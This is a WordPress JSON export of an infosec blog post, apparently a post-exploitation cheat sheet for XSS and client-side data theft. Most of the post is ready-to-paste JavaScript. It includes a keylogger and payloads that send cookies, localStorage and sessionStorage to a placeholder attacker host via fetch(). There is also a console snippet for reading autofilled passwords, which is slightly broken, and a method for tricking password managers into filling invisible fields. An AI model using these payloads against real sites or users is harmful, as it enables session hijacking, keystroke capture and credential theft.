{"id":4460,"date":"2024-09-25T14:27:12","date_gmt":"2024-09-25T12:27:12","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=4460"},"modified":"2024-09-25T15:19:09","modified_gmt":"2024-09-25T13:19:09","slug":"client-side-extractio-of-password-fields","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=4460","title":{"rendered":"<span class=\"caps\">XSS<\/span> \/ Client-side Browser extraction"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">Get hidden content from password fields<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You analyse a sys\u00adtem where a user\u00adname \/ pass\u00adword was auto\u00admat\u00adi\u00adcal\u00adly filled out.<\/li>\n\n\n\n<li>You want to extract the password.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Use JavaScript for extrac\u00adtion. Copy and pase the fol\u00adlow\u00ading into the web browser\u2019s console:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>let fields = document.getElementsByTagName(\"input\");\nfor (let field in fields) {\n  console.log(input.value);\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Extract keystrokes live from a Browser<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You have access to a <span class=\"caps\">JS<\/span> con\u00adsole from some&nbsp;user.<\/li>\n\n\n\n<li>You want to log the key\u00adstrokes of a&nbsp;page.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Do:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Open a lis\u00adten\u00ader on an own serv\u00ader, e.g. <code>python -m http.server 80<\/code><\/li>\n\n\n\n<li>Paste the fol\u00adlow\u00ading <span class=\"caps\">JS<\/span> in the web browser\u2019s console:<\/li>\n<\/ol>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>function logKey(event){\n  fetch(\"http:\/\/$attackerListenerIp\/k?key=\" + event.key)\n}\ndocument.addEventListener('keydown', logKey);<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Extract Cookies<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You can inject <span class=\"caps\">JS<\/span> (<span class=\"caps\">XSS<\/span> \/ direct access) and want to get all cookies.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Inject\/Do:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>let cookie = document.cookie\nlet encodedCookie = encodeURIComponent(cookie)\nfetch(\"http:\/\/$attackerListenerIp\/d?data=\" + encodedCookie)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Extract local \/ session storage<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Like above:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>let data = JSON.stringify(localStorage)\nlet encodedData = encodeURIComponent(data)\nfetch(\"http:\/\/$attackerListenerIp\/d?data=\" + encodedData)<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>let data = JSON.stringify(sessionStorage)\nlet encodedData = encodeURIComponent(data)\nfetch(\"http:\/\/$attackerListenerIp\/d?data=\" + encodedData)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Stealing site passwords<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A pass\u00adword man\u00adag\u00ader is used by a user where you can inject <span class=\"caps\">JS<\/span>.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Then, inject <span class=\"caps\">JS<\/span> which adds an invis\u00adi\u00adble user\/username\/name text field and a field with <code>type=\"password\"<\/code>. Wait some sec\u00adonds and then, extract the val\u00adue of these fieds. If a pass\u00adword man\u00adag\u00ader is in place, it may have filled in sen\u00adsi\u00adtive data automatically.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Get hid\u00adden con\u00adtent from pass\u00adword fields Sce\u00adnario: Use JavaScript for extrac\u00adtion. Copy and pase the fol\u00adlow\u00ading into the web browser\u2019s con\u00adsole: Extract key\u00adstrokes live from a Brows\u00ader Sce\u00adnario: Do: Extract Cook\u00adies Sce\u00adnario: Inject\/Do: Extract local \/ ses\u00adsion stor\u00adage Like above: Steal\u00ading site pass\u00adwords Sce\u00adnario: Then, inject <span class=\"caps\">JS<\/span> which adds an invis\u00adi\u00adble user\/username\/name text field&nbsp;and&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[472],"tags":[489,61,511,510,488],"class_list":["post-4460","post","type-post","status-publish","format-standard","hentry","category-postexp","tag-cross-site-scripting","tag-forensic","tag-password-extraction","tag-password-field","tag-xss"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4460","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4460"}],"version-history":[{"count":6,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4460\/revisions"}],"predecessor-version":[{"id":4473,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/4460\/revisions\/4473"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4460"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4460"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4460"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}